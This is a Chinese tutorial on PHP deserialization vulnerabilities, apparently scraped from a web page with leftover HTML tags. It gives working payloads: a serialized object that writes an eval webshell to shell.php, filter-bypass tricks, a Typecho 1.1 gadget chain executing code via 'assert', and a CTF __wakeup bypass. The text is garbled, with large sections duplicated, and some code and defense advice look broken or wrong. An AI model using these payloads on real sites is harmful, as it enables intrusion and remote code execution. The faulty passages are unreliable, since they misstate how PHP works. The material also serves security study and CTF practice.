PHP反序列化漏洞深入分析与利用<\/h1>

1. 反序列化基础概念<\/h2>
PHP反序列化是将序列化的字符串还原为PHP变量或对象的过程。当攻击者能够控制反序列化的输入时，就可能利用这一特性执行恶意操作。<\/p>

1.1 序列化格式<\/h3>

PHP序列化支持以下几种数据类型：<\/p>

String<\/li>
Integer<\/li>
Boolean<\/li>
Null<\/li>
Array<\/li>

Object<\/li> <\/ul>

示例序列化字符串：<\/p>

O:8:"Template":2:{s:9:"cacheFile";s:10:".\/test.php";s:8:"template";s:25:"<?php eval($_POST[xx]);?>";}
<\/code><\/pre>
2. 反序列化漏洞原理<\/h2>
2.1 漏洞触发条件<\/h3>

存在unserialize()<\/code>函数且参数可控<\/li>
存在可被利用的魔术方法<\/li>
存在可利用的危险函数调用链<\/li>
<\/ol>
2.2 关键魔术方法<\/h3>



魔术方法<\/th>
触发条件<\/th>
<\/tr>
<\/thead>


__wakeup()<\/code><\/td>
使用unserialize<\/code>时触发<\/td>
<\/tr>

__sleep()<\/code><\/td>
使用serialize<\/code>时触发<\/td>
<\/tr>

__destruct()<\/code><\/td>
对象被销毁时触发<\/td>
<\/tr>

__call()<\/code><\/td>
在对象上下文中调用不可访问的方法时触发<\/td>
<\/tr>

__get()<\/code><\/td>
从不可访问的属性读取数据时触发<\/td>
<\/tr>

__toString()<\/code><\/td>
把类当作字符串使用时触发<\/td>
<\/tr>
<\/tbody>
<\/table>
3. 漏洞利用技术<\/h2>
3.1 绕过过滤检测<\/h3>
原始代码中的过滤：<\/p>
if<\/span> (substr<\/span>($data, 0<\/span>, 2<\/span>) !==<\/span> 'O:'<\/span> &&<\/span> !<\/span>preg_match<\/span>('\/O:\d:\/'<\/span>, $data)) {
<\/span><\/span>    return<\/span> unserialize<\/span>($data);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用数组包裹对象：a:1:{i:0;O:8:"Template"...}<\/code><\/li>
在对象序列化字符串中添加+<\/code>号：O:+8:"Template"...<\/code><\/li>
<\/ol>
PHP源码分析：<\/p>

在var_unserializer.c<\/code>中，O:<\/code>后面可以跟+<\/code>号<\/li>
yy17<\/code>函数允许O:+数字<\/code>的格式<\/li>
<\/ul>
3.2 实际利用案例<\/h3>
案例1：文件写入<\/strong><\/p>
class<\/span> Template<\/span> {
<\/span><\/span>    public<\/span> $cacheFile;
<\/span><\/span>    public<\/span> $template;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        file_put_contents<\/span>($this-><\/span>cacheFile<\/span>, $this-><\/span>template<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 构造payload
<\/span><\/span><\/span><\/span>$payload =<\/span> new<\/span> Template<\/span>();
<\/span><\/span>$payload-><\/span>cacheFile<\/span> =<\/span> '.\/shell.php'<\/span>;
<\/span><\/span>$payload-><\/span>template<\/span> =<\/span> '<?php eval($_POST[cmd]);?>'<\/span>;
<\/span><\/span>echo<\/span> serialize<\/span>($payload);
<\/span><\/span><\/code><\/pre>案例2：Typecho 1.1反序列化漏洞<\/strong><\/p>
利用链：<\/p>

反序列化触发Typecho_Feed<\/code>的__toString()<\/code><\/li>
触发Typecho_Request<\/code>的__get()<\/code><\/li>
通过array_map()<\/code>或call_user_func()<\/code>执行任意代码<\/li>
<\/ol>
关键代码：<\/p>
\/\/ Typecho_Request中的__get方法
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> __get($key) {
<\/span><\/span>    return<\/span> $this-><\/span>get<\/span>($key);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>public<\/span> function<\/span> get<\/span>($key, $default =<\/span> NULL<\/span>) {
<\/span><\/span>    $value =<\/span> isset<\/span>($this-><\/span>_params<\/span>[$key]) ?<\/span> $this-><\/span>_params<\/span>[$key] :<\/span> $default;
<\/span><\/span>    $value =<\/span> !<\/span>is_array<\/span>($value) &&<\/span> strlen<\/span>($value) ><\/span> 0<\/span> ?<\/span> $value :<\/span> $default;
<\/span><\/span>    return<\/span> $this-><\/span>_applyFilter<\/span>($value);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>protected<\/span> function<\/span> _applyFilter<\/span>($value) {
<\/span><\/span>    if<\/span> ($this-><\/span>_filter<\/span>) {
<\/span><\/span>        foreach<\/span> ($this-><\/span>_filter<\/span> as<\/span> $filter) {
<\/span><\/span>            $value =<\/span> is_array<\/span>($value) ?<\/span> array_map<\/span>($filter, $value) :<\/span> $filter($value);
<\/span><\/span>        }
<\/span><\/span>        $this-><\/span>_filter<\/span> =<\/span> array<\/span>();
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>构造payload：<\/p>
$chain =<\/span> [
<\/span><\/span>    'adapter'<\/span> =><\/span> new<\/span> Typecho_Feed<\/span>(), \/\/ 触发__toString
<\/span><\/span><\/span><\/span>    'prefix'<\/span> =><\/span> 'typecho_'<\/span>
<\/span><\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ 设置Typecho_Feed的属性
<\/span><\/span><\/span><\/span>$feed =<\/span> new<\/span> Typecho_Feed<\/span>();
<\/span><\/span>$feed-><\/span>_type<\/span> =<\/span> 'RSS 2.0'<\/span>;
<\/span><\/span>$feed-><\/span>_items<\/span> =<\/span> [
<\/span><\/span>    [
<\/span><\/span>        'author'<\/span> =><\/span> new<\/span> Typecho_Request<\/span>() \/\/ 触发__get
<\/span><\/span><\/span><\/span>    ]
<\/span><\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ 设置Typecho_Request的属性
<\/span><\/span><\/span><\/span>$request =<\/span> new<\/span> Typecho_Request<\/span>();
<\/span><\/span>$request-><\/span>_params<\/span> =<\/span> ['screenName'<\/span> =><\/span> 'phpinfo()'<\/span>];
<\/span><\/span>$request-><\/span>_filter<\/span> =<\/span> ['assert'<\/span>];
<\/span><\/span>
<\/span><\/span>echo<\/span> serialize<\/span>($chain);
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>


输入验证<\/strong>：<\/p>

不要反序列化不可信的输入<\/li>
使用JSON等更安全的格式传递数据<\/li>
<\/ul>
<\/li>

代码层面<\/strong>：<\/p>
\/\/ 安装完成后禁用install.php
<\/span><\/span><\/span><\/span>if<\/span> (file_exists<\/span>(dirname<\/span>(__FILE__<\/span>) .<\/span> '\/config.inc.php'<\/span>)) {
<\/span><\/span>    exit<\/span>('Access Denied'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

PHP配置<\/strong>：<\/p>

使用unserialize_callback_func<\/code>设置回调函数<\/li>
限制可反序列化的类：ini_set('unserialize_allowed_classes', 'allowed_class1,allowed_class2');<\/code><\/li>
<\/ul>
<\/li>

魔术方法安全<\/strong>：<\/p>

避免在魔术方法中执行危险操作<\/li>
对魔术方法中的参数进行严格过滤<\/li>
<\/ul>
<\/li>
<\/ol>
5. CTF题目分析<\/h2>
题目代码关键点：<\/p>
class<\/span> HITCON<\/span> {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        $this-><\/span>__conn<\/span>();
<\/span><\/span>        if<\/span> (in_array<\/span>($this-><\/span>method<\/span>, array<\/span>("login"<\/span>, "source"<\/span>))) {
<\/span><\/span>            @<\/span>call_user_func_array<\/span>(array<\/span>($this, $this-><\/span>method<\/span>), $this-><\/span>args<\/span>);
<\/span><\/span>        }
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> SoFun<\/span> {
<\/span><\/span>    public<\/span> $file=<\/span>'index.php'<\/span>;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        if<\/span>(!<\/span>empty<\/span>($this-><\/span>file<\/span>)) {
<\/span><\/span>            include<\/span> $this-><\/span>file<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    function<\/span> __wakeup() {
<\/span><\/span>        $this-><\/span>file<\/span> =<\/span> 'index.php'<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用思路：<\/p>

通过SoFun<\/code>类的__destruct<\/code>方法包含任意文件<\/li>
绕过__wakeup<\/code>的重置（使用CVE-2016-7124，当对象属性个数大于实际个数时跳过__wakeup<\/code>）<\/li>
构造payload读取flag.php<\/li>
<\/ol>
示例payload：<\/p>
$payload =<\/span> new<\/span> SoFun<\/span>();
<\/span><\/span>$payload-><\/span>file<\/span> =<\/span> 'flag.php'<\/span>;
<\/span><\/span>echo<\/span> serialize<\/span>($payload);
<\/span><\/span>\/\/ 修改属性数量绕过__wakeup
<\/span><\/span><\/span>\/\/ O:5:"SoFun":2:{s:4:"file";s:8:"flag.php";}
<\/span><\/span><\/span><\/code><\/pre>6. 总结<\/h2>
PHP反序列化漏洞利用的关键点：<\/p>

找到可控的反序列化入口点<\/li>
分析可利用的魔术方法链<\/li>
构造合适的对象属性触发危险操作<\/li>
绕过可能的过滤和限制<\/li>
<\/ol>
防御要点：<\/p>

避免反序列化用户输入<\/li>
对必须的反序列化操作进行严格过滤<\/li>
审查项目中的魔术方法实现<\/li>
保持PHP版本更新，修复已知漏洞<\/li>
<\/ol>

魔术方法<\/th>	触发条件<\/th> <\/tr> <\/thead>
`__wakeup()<\/code><\/td>`	使用`unserialize<\/code>时触发<\/td> <\/tr>`
`__sleep()<\/code><\/td>`	使用`serialize<\/code>时触发<\/td> <\/tr>`
`__destruct()<\/code><\/td>`	对象被销毁时触发<\/td> <\/tr>
`__call()<\/code><\/td>`	在对象上下文中调用不可访问的方法时触发<\/td> <\/tr>
`__get()<\/code><\/td>`	从不可访问的属性读取数据时触发<\/td> <\/tr>
`__toString()<\/code><\/td>`	把类当作字符串使用时触发<\/td> <\/tr> <\/tbody> <\/table> 3. 漏洞利用技术<\/h2> 3.1 绕过过滤检测<\/h3> 原始代码中的过滤：<\/p> if<\/span> (substr<\/span>($data, 0<\/span>, 2<\/span>) !==<\/span> 'O:'<\/span> &&<\/span> !<\/span>preg_match<\/span>('\/O:\d:\/'<\/span>, $data)) { <\/span><\/span> return<\/span> unserialize<\/span>($data); <\/span><\/span>} <\/span><\/span><\/code><\/pre>绕过方法：<\/p> 使用数组包裹对象：a:1:{i:0;O:8:"Template"...}<\/code><\/li> 在对象序列化字符串中添加+<\/code>号：O:+8:"Template"...<\/code><\/li> <\/ol> PHP源码分析：<\/p> 在var_unserializer.c<\/code>中，O:<\/code>后面可以跟+<\/code>号<\/li> yy17<\/code>函数允许O:+数字<\/code>的格式<\/li> <\/ul> 3.2 实际利用案例<\/h3> 案例1：文件写入<\/strong><\/p> class<\/span> Template<\/span> { <\/span><\/span> public<\/span> $cacheFile; <\/span><\/span> public<\/span> $template; <\/span><\/span> <\/span><\/span> public<\/span> function<\/span> __destruct() { <\/span><\/span> file_put_contents<\/span>($this-><\/span>cacheFile<\/span>, $this-><\/span>template<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 构造payload <\/span><\/span><\/span><\/span>$payload =<\/span> new<\/span> Template<\/span>(); <\/span><\/span>$payload-><\/span>cacheFile<\/span> =<\/span> '.\/shell.php'<\/span>; <\/span><\/span>$payload-><\/span>template<\/span> =<\/span> '<?php eval($_POST[cmd]);?>'<\/span>; <\/span><\/span>echo<\/span> serialize<\/span>($payload); <\/span><\/span><\/code><\/pre>案例2：Typecho 1.1反序列化漏洞<\/strong><\/p> 利用链：<\/p> 反序列化触发Typecho_Feed<\/code>的__toString()<\/code><\/li> 触发Typecho_Request<\/code>的__get()<\/code><\/li> 通过array_map()<\/code>或call_user_func()<\/code>执行任意代码<\/li> <\/ol> 关键代码：<\/p> \/\/ Typecho_Request中的__get方法 <\/span><\/span><\/span><\/span>public<\/span> function<\/span> __get($key) { <\/span><\/span> return<\/span> $this-><\/span>get<\/span>($key); <\/span><\/span>} <\/span><\/span> <\/span><\/span>public<\/span> function<\/span> get<\/span>($key, $default =<\/span> NULL<\/span>) { <\/span><\/span> $value =<\/span> isset<\/span>($this-><\/span>_params<\/span>[$key]) ?<\/span> $this-><\/span>_params<\/span>[$key] :<\/span> $default; <\/span><\/span> $value =<\/span> !<\/span>is_array<\/span>($value) &&<\/span> strlen<\/span>($value) ><\/span> 0<\/span> ?<\/span> $value :<\/span> $default; <\/span><\/span> return<\/span> $this-><\/span>_applyFilter<\/span>($value); <\/span><\/span>} <\/span><\/span> <\/span><\/span>protected<\/span> function<\/span> _applyFilter<\/span>($value) { <\/span><\/span> if<\/span> ($this-><\/span>_filter<\/span>) { <\/span><\/span> foreach<\/span> ($this-><\/span>_filter<\/span> as<\/span> $filter) { <\/span><\/span> $value =<\/span> is_array<\/span>($value) ?<\/span> array_map<\/span>($filter, $value) :<\/span> $filter($value); <\/span><\/span> } <\/span><\/span> $this-><\/span>_filter<\/span> =<\/span> array<\/span>(); <\/span><\/span> } <\/span><\/span> return<\/span> $value; <\/span><\/span>} <\/span><\/span><\/code><\/pre>构造payload：<\/p> $chain =<\/span> [ <\/span><\/span> 'adapter'<\/span> =><\/span> new<\/span> Typecho_Feed<\/span>(), \/\/ 触发__toString <\/span><\/span><\/span><\/span> 'prefix'<\/span> =><\/span> 'typecho_'<\/span> <\/span><\/span>]; <\/span><\/span> <\/span><\/span>\/\/ 设置Typecho_Feed的属性 <\/span><\/span><\/span><\/span>$feed =<\/span> new<\/span> Typecho_Feed<\/span>(); <\/span><\/span>$feed-><\/span>_type<\/span> =<\/span> 'RSS 2.0'<\/span>; <\/span><\/span>$feed-><\/span>_items<\/span> =<\/span> [ <\/span><\/span> [ <\/span><\/span> 'author'<\/span> =><\/span> new<\/span> Typecho_Request<\/span>() \/\/ 触发__get <\/span><\/span><\/span><\/span> ] <\/span><\/span>]; <\/span><\/span> <\/span><\/span>\/\/ 设置Typecho_Request的属性 <\/span><\/span><\/span><\/span>$request =<\/span> new<\/span> Typecho_Request<\/span>(); <\/span><\/span>$request-><\/span>_params<\/span> =<\/span> ['screenName'<\/span> =><\/span> 'phpinfo()'<\/span>]; <\/span><\/span>$request-><\/span>_filter<\/span> =<\/span> ['assert'<\/span>]; <\/span><\/span> <\/span><\/span>echo<\/span> serialize<\/span>($chain); <\/span><\/span><\/code><\/pre>4. 防御措施<\/h2> 输入验证<\/strong>：<\/p> 不要反序列化不可信的输入<\/li> 使用JSON等更安全的格式传递数据<\/li> <\/ul> <\/li> 代码层面<\/strong>：<\/p> \/\/ 安装完成后禁用install.php <\/span><\/span><\/span><\/span>if<\/span> (file_exists<\/span>(dirname<\/span>(__FILE__<\/span>) .<\/span> '\/config.inc.php'<\/span>)) { <\/span><\/span> exit<\/span>('Access Denied'<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> PHP配置<\/strong>：<\/p> 使用unserialize_callback_func<\/code>设置回调函数<\/li> 限制可反序列化的类：ini_set('unserialize_allowed_classes', 'allowed_class1,allowed_class2');<\/code><\/li> <\/ul> <\/li> 魔术方法安全<\/strong>：<\/p> 避免在魔术方法中执行危险操作<\/li> 对魔术方法中的参数进行严格过滤<\/li> <\/ul> <\/li> <\/ol> 5. CTF题目分析<\/h2> 题目代码关键点：<\/p> class<\/span> HITCON<\/span> { <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> function<\/span> __destruct() { <\/span><\/span> $this-><\/span>__conn<\/span>(); <\/span><\/span> if<\/span> (in_array<\/span>($this-><\/span>method<\/span>, array<\/span>("login"<\/span>, "source"<\/span>))) { <\/span><\/span> @<\/span>call_user_func_array<\/span>(array<\/span>($this, $this-><\/span>method<\/span>), $this-><\/span>args<\/span>); <\/span><\/span> } <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>class<\/span> SoFun<\/span> { <\/span><\/span> public<\/span> $file=<\/span>'index.php'<\/span>; <\/span><\/span> function<\/span> __destruct() { <\/span><\/span> if<\/span>(!<\/span>empty<\/span>($this-><\/span>file<\/span>)) { <\/span><\/span> include<\/span> $this-><\/span>file<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> function<\/span> __wakeup() { <\/span><\/span> $this-><\/span>file<\/span> =<\/span> 'index.php'<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用思路：<\/p> 通过SoFun<\/code>类的__destruct<\/code>方法包含任意文件<\/li> 绕过__wakeup<\/code>的重置（使用CVE-2016-7124，当对象属性个数大于实际个数时跳过__wakeup<\/code>）<\/li> 构造payload读取flag.php<\/li> <\/ol> 示例payload：<\/p> $payload =<\/span> new<\/span> SoFun<\/span>(); <\/span><\/span>$payload-><\/span>file<\/span> =<\/span> 'flag.php'<\/span>; <\/span><\/span>echo<\/span> serialize<\/span>($payload); <\/span><\/span>\/\/ 修改属性数量绕过__wakeup <\/span><\/span><\/span>\/\/ O:5:"SoFun":2:{s:4:"file";s:8:"flag.php";} <\/span><\/span><\/span><\/code><\/pre>6. 总结<\/h2> PHP反序列化漏洞利用的关键点：<\/p> 找到可控的反序列化入口点<\/li> 分析可利用的魔术方法链<\/li> 构造合适的对象属性触发危险操作<\/li> 绕过可能的过滤和限制<\/li> <\/ol> 防御要点：<\/p> 避免反序列化用户输入<\/li> 对必须的反序列化操作进行严格过滤<\/li> 审查项目中的魔术方法实现<\/li> 保持PHP版本更新，修复已知漏洞<\/li> <\/ol>

PHP反序列化漏洞深入分析与利用<\/h1>

1. 反序列化基础概念<\/h2> PHP反序列化是将序列化的字符串还原为PHP变量或对象的过程。当攻击者能够控制反序列化的输入时，就可能利用这一特性执行恶意操作。<\/p>

2. 反序列化漏洞原理<\/h2>

3. 漏洞利用技术<\/h2>

1. 反序列化基础概念<\/h2>
PHP反序列化是将序列化的字符串还原为PHP变量或对象的过程。当攻击者能够控制反序列化的输入时，就可能利用这一特性执行恶意操作。<\/p>